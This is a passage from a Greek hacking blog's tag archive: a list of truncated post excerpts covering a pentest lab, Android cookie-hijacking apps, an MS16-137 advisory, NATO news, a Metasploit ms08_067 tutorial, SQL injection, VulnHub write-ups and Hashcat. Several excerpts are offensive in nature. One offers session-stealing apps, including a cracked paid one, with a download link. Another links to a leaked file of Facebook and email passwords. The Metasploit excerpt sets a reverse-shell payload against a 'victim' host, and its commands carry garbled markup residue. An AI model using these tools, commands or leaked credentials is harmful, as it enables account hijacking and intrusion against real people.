Μετάβαση στο κύριο περιεχόμενο


Εμφάνιση αναρτήσεων με την ετικέτα Hacking

Client side attack

*** There is a sound problem on video ***

You are a Penetration Tester and you’re asked to determine if the

corporate network is secure and if we are able to reach the servers

withing the DMZ.

The internal corporate network is divided in two

segments: the internal network where the employees machine reside and

the DMZ where there are company servers.

######## GOALS #############

1) Gain access to the internal network

2) Exploit and get a shell to a server within the DMZ

############WHAT YOU WILL LEARN ################

1) How to use Client-Side attacks

2) Pivoting

3) Fingerprint Hosts and Services though Pivoting

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of

different tools and different methods to achieve the same goal.

They are not meant to be used as a methodology.



2) nmap

3) proxychains

4) Mail client ( i.e. Thunderbird )


Labs machines (like web server …

cSploit Android Presentations video

Android Hijacking Tools

Όλα τα παρακάτω προγράμματα χρησιμοποιούνε την μέθοδο του cookie hijacking/stealing.

Για να χρησιμοποιήσετε τα παρακάτω προγράμματα πρέπει να έχετε ROOTάρει την συσκευή σας.

Όταν κατεβάσετε τα .apk στο κινητό σας, θα χρειαστείτε έναν file manager για να τα κάνετε εγκατάσταση.
File managers μπορείτε να βρείτε στο google store η να κατεβάσετε έναν από το internet.

Hidden Content




Το faceniff είναι πληρωτέο πρόγραμμα που το trial version σου δίνει την δυνατότητα μέχρι 3 accounts.Εμείς θα χρησιμοποιήσουμε την σπασμένη έκδοση.Για το πως θα κάνετε την εγκατάσταση διαβάστε το "Steps το Use:-"

Droid Sniff

mediafire.com download/c3mr5lx34kpmp97/DroidSniff.apk

MS16-137: LSASS Remote Memory Corruption Advisory

Title: LSASS SMB NTLM Exchange Remote Memory Corruption
Version: 1.0
Issue type: Null Pointer Dereference
Authentication: Pre-Authenticated
Affected vendor: Microsoft
Release date: 8/11/2016
Discovered by: Laurent Gaffié
Advisory by: Laurent Gaffié
Issue status: Patch available
Affected versions: Windows: XP/Server 2003, Vista, 7, 2008R2, Server 2012R2, 10.

A vulnerability in Windows Local Security Authority Subsystem Service (LSASS) was found on Windows OS versions ranging from Windows XP through to Windows 10. This vulnerability allows an attacker to remotely crash the LSASS.EXE process of an affected workstation with no user interaction.
Successful remote exploitation of this issue will result in a reboot of the target machine. Local privilege escalation should also be considered likely.
Microsoft acknowledged the vulnerability and has published an advisory and a patch, resolving …

Το NATO δέχεται 500 επιθέσεις hacking το μήνα!

Tο NATO αποτελεί στόχο για πολλούς hackers παγκοσμίως καθώς σύμφωνα με πρόσφατο δημοσίευμα δέχεται κάθε μήνα κατά μέσο όρο 500 επιθέσεις.

Ο Oana Lungescu, εκπρόσωπος του ΝΑΤΟ, δήλωσε στο CNN ότι σημειώνεται αύξηση περίπου 60% του αριθμού των επιθέσεων το 2016 σε σχέση με το 2015. Συνήθως, η ταυτότητα των εισβολέων είναι δύσκολο να προσδιοριστεί παρόλο που γίνονται άμεσα έρευνες για τον εντοπισμό τους. Αναμφίβολα, οι ξένες κυβερνήσεις, οι εγκληματίες και οι τρομοκράτες αποτελούν πιθανή προέλευση των επιθέσεων αλλά σύμφωνα με τους ειδικούς ο υποψήφιος που κερδίζει με διαφορά είναι τα αντίπαλα έθνη.

Το μόνο σίγουρο είναι ότι το ΝΑΤΟ ξέρει πώς να διαχειριστεί την κατάσταση. Συγκεκριμένα, στα μέσα του 2016 προειδοποίησε του hackers ότι αν επιδιώξουν και άλλες επιθέσεις θα έχουν να αντιμετωπίσουν την απάντηση του συνόλου της συμμαχίας στο πλαίσιο του “Article V”, το σύμφωνο της αμοιβαίας άμυνας. «Έχουμε αποφασίσει στην επόμενη διαδικτυακή επίθεση να ανταποδώσουμε με παρόμοιο τρόπο όλο το σύνο…

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_, ex067_netapi exploit

Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.

Ανοίγω ένα τερματικό...
root@bt:msfconsole <- font="">
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <- font="">

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Microsoft Server Service Relative Path Stack

Συνχίζουμε γράφοντας τις παρακάτω εντολές...

msf > use windows/smb/ms08_067_netapi <- span="">
msf exploit(ms08_067_netapi) > show options <- span="">
msf exploit(ms08_067_netapi) > set RHOST <- ip="" span="" victim="">
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <- span="&qu…

How to identify SQL injection & how to manual + automatic exploitation (GR)


Θα μπορούσαμε να το αποκαλέσουμε και κράχτη αφού αποτελεί ουσιαστικό μέρος της εργαλειοθήκης μας όταν είμαστε συνδεδεμένοι στο διαδίκτυο και προστατεύει την ιδιωτική μας ζωή.
Αυτό που οι περισσότεροι χρήστες δεν συνειδητοποιούν, αναφέρει το περιοδικό MIT Technology Review, είναι ότι η Evidon που είναι μητρική εταιρεία της Ghostery, συλλέγει τα δεδομένα των χρηστών και τα πωλεί στους διαφημιστές.

Θα πρέπει να καταστεί σαφές ότι αν επιλέξετε να ξεκλικάρετε την επιλογή για κοινή χρήση πληροφοριών εντός της Ghostery, τότε αυτομάτως αποκλείεται η συλλογή των δεδομένων σας και η Evidon συμμορφώνεται με τις πληροφορίες αυτού το αιτήματος.

Ο συν-ιδρυτής και Διευθύνων Σύμβουλος της Evidon, ο Scott Meyer, λέει ότι δεν υπάρχει καμμία σύγκρουση των δύο ρόλων της εταιρείας του που διαδραματίζει έναν καίριο ρόλο καθώς προσφέρει στους χρήστες ένα εργαλείο που τους κρύβει από τον κλάδο της διαφήμισης ενώ παράλληλα παρέχει δεδομένα σχετικά με τους χρήστες σε διαφημιστικές εταιρείες.
Οτιδήποτε δίνει στους …


Vulnerability Scanner

As the first program of 2014 I bring you the new version of my ParanoicScan in its version 1.7, while some people stole the source code of the previous version of this program code, the issue is that not bother me that you used the code but only changed him the program name and the name of the author did not bother to change the names of the variables only changed the name of the author, for a moment hesitate to continue to share the code of this 2-year project working but despite that I continue to share the code of this program, besides explorer (of perlenespanol) recommended me to do another version of this program was to demonstrate that the real author so that the program has the dual function and arrange countless bugs that were in all the code.

[++] Old Options

Google & Bing Scanner that also scan :




SQL GET + Admin

Directory listing


Jet Database




Full Source Discloure

HTTP Information

SQLi Scanner


"OpIsrael Of Gaza Hacker Team # In Password FaceBook And Email" .txt

Κλικ στον παρακάτω σύνδεσμο!

Τα αρχεία .txt δεν φιλοξενούνται στο blog! 5 seconds...


Hell hacking challenge

One of the latest and more challenging boot2roots released on VulnHub as of late is Hell. This boot2root by Peleus has appeared to cause quite a bit of hair pulling and teeth gnashing whenever it’s mentioned on IRC. I initially started off with his beta version but had to put it away when I got too busy with work. When I was finally ready to try again, the official version had been released, so I downloaded it and started over.

The goal of the challenge is to read /root/flag.txt. I found a way to solve the challenge without getting shell on the target. I think this might be a bug, and at some point I might try to solve it the way it was intended. Still, it’s a solution, so without further ado, here’s the shortcut method of solving Hell.

Using netdiscover, I found the IP address for Hell at An nmap scan on the target revealed quite a few open ports.

Η συνεχεια του αθρόου είναι εδώ ;)  >>((!))

Milnet hacking challenge

It’s been a while since I’ve done one of these. Milnet is the latest VM uploaded toVulnHub, and is a beginner level challenge. Not having anything to do at midnight, I decided to give it a shot, if not to kill some time before crashing. You can grab Milnet here. Milnet is kind enough to tell us what IP address it’s running on once it boots up. Thank you. In my case, it was As usual, enumeration is key, so I started with a port scan: # echo > ip # onetwopunch.sh -t ip -i eth1 -n '-sV -A' _ _ _ ___ _ __ ___ | |___ _____ _ __ _ _ _ __ ___| |__ / \ / _ \| '_ \ / _ \ | __\ \ /\ / / _ \ | '_ \| | | | '_ \ / __| '_ \ / / | (_) | | | | __/ ᕦ(ò_óˇ)ᕤ | |_ \ V V / (_) | | |_) | |_| | | | | (__| | | /\_/ \___/|_| |_|\___| \__| \_/\_/ \___/ | .__/ \__,_|_| |_|\___|_| |_\/ |_| by superkojiman [+] Protocol : tcp [+] Interface: eth1 [+] Nmap opts: -sV -A [+] Targets : ip [+] Scanning for tcp ports... [+] Obtaining all ope…

To Hashcat μπορεί τώρα να σπάσει κωδικούς έως και 55 χαρακτήρων

Οι προγραμματιστές του oclHashcat έχουν κυκλοφορήσει μια νέα έκδοση του δημοφιλούς εργαλείου ανέρευσης κωδικών και υποστηρίζουν ότι είναι σε θέση να σπάσει κωδικούς που έχουν έως και 55 χαρακτήρες.

Πολλά ευαίσθητα δεδομένα διέρρευσαν αυτές τις μέρες από τους χάκερ. Αν και στις περισσότερες περιπτώσεις οι χακαρισμένοι κωδικοί πρόσβασης ήταν κρυπτογραφημένοι, είναι όλο και πιο εύκολο για τους εγκληματίες του κυβερνοχώρου να σπάνε τα hashes. Για αυτές τις «δουλειές» υπάρχουν διάφορα εργαλεία.

Ένα από αυτά είναι το δημοφιλές hashcat, όπου η λογική ύπαρξής του είναι να το χρησιμοποιήσουμε για να μπορέσουμε να ξεκλειδώσουμε κάτι δικό μας από το οποίο έχουμε ξεχάσει τι κωδικό πρόσβασης του είχαμε δώσει. Ειναι ένα Password recovery εν ολίγοις, ένα πρόγραμμα ανάκτησης κωδικών.

Η τελευταία έκδοση του oclHashcat υποστηρίζει αρκετούς νέους αλγορίθμους και GPUs.

Στην έκδοση αυτή έχουν εφαρμοστεί διάφορες αλλαγές, αλλά το πιο σημαντικό είναι το γεγονός ότι το εργαλείο μπορεί πλέον να χρησιμοποιηθεί γι…